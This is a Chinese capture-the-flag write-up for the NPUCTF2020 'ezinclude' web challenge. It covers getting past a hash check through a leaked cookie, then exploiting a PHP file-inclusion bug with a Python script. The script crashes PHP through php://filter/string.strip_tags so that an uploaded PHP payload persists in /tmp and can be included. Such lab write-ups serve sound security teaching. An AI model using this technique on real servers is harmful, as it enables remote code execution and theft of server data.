[NPUCTF2020]ezinclude

这里打开便是显示用户名密码错误

查看页面源代码发现md5(secret.name)===pass,我们根本就不知道secret的值,所以就

先尝试输入name=1,抓包,发现cookie处有哈希值

将name等于7时,哈希值有所不同

所以这个哈希值就是pass的值,所以我们可以另name为1,pass为name为1是的Hash

返回404

查看抓到的登录包,发现在响应包中有flflflflag.php文件

访问flflflflag.php文件并抓包查看

发现这是文件包含,使用伪协议会返回首页面,没有别的内容

使用dirsearch进行目录扫描发现dir.php文件,访问一下

页面显示的 array(2) { [0]=> string(1) "." [1]=> string(2) ".." } 是典型的 PHP scandir() 函数的输出结果,表示当前目录下只有"当前目录 (.)"和"上级目录 (..)"。说明当前目录是干净的而只有 /tmp 目录在没有上传任务时经常是空的,只有 . 和 ..

这里考察的是PHP临时文件包含,其基本是两种情况:

1.利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除

2.PHP版本<7.2,利用php崩溃留下临时文件

使用py脚本尝试写入shell

复制代码
import requests
from io import BytesIO
 
payload = "<?php phpinfo()?>"
file_data = {
    'file': BytesIO(payload.encode())
}
url = "http://f6a351b3-c226-4aab-b5a7-1c72236efcc6.node4.buuoj.cn/flflflflag.php?"\
      +"file=php://filter/string.strip_tags/resource=/etc/passwd"
r = requests.post(url=url, files=file_data, allow_redirects=False)

绕过 include($_GET["file"]) 的限制,通过 php://filter 构造一个可写的临时文件。

利用 POST 上传的 file 字段,将恶意 PHP 代码写入到临时文件中。

让 PHP 包含并执行这个临时文件,从而获取服务器信息或读取敏感数据。

然后访问dir.php,发现有了一个phpFuLK0i文件

然后就可以查看/tmp目录下phpFuLK0i文件发现并不能直接访问tmp目录下的文件../一层一层尝试即可,访问执行后发现flag在phpinfo页中

相关推荐
小怪吴吴9 小时前
idea 开发Android
android·java·intellij-idea
xiaoyan201510 小时前
2026爆肝!Flutter3.41纯手撸微信聊天APP原生应用
android·flutter·dart
jinanwuhuaguo11 小时前
OpenClaw协议霸权——从 MCP 标准到意图封建化的政治经济学(第十八篇)
android·人工智能·kotlin·拓扑学·openclaw
撩得Android一次心动11 小时前
Android Room 数据库详解【源码篇】
android·数据库·android jetpack·room
TO_ZRG12 小时前
Android WorkManager 完全入门指南
android
a8a30213 小时前
Laravel 6.x新特性全解析
android
用户游民13 小时前
Android 腾讯X5WebView如何禁止系统自带剪切板和自定义剪切板视图
android·java
Lyyaoo.13 小时前
TreadLocal和TreadLocalMap
android·java·redis
CyL_Cly13 小时前
localsend安卓手机下载 支持win/mac/ubuntu
android·macos·智能手机
大尚来也13 小时前
防御现代Web威胁:使用PHP原生过滤器防止SQL注入与XSS的终极指南
android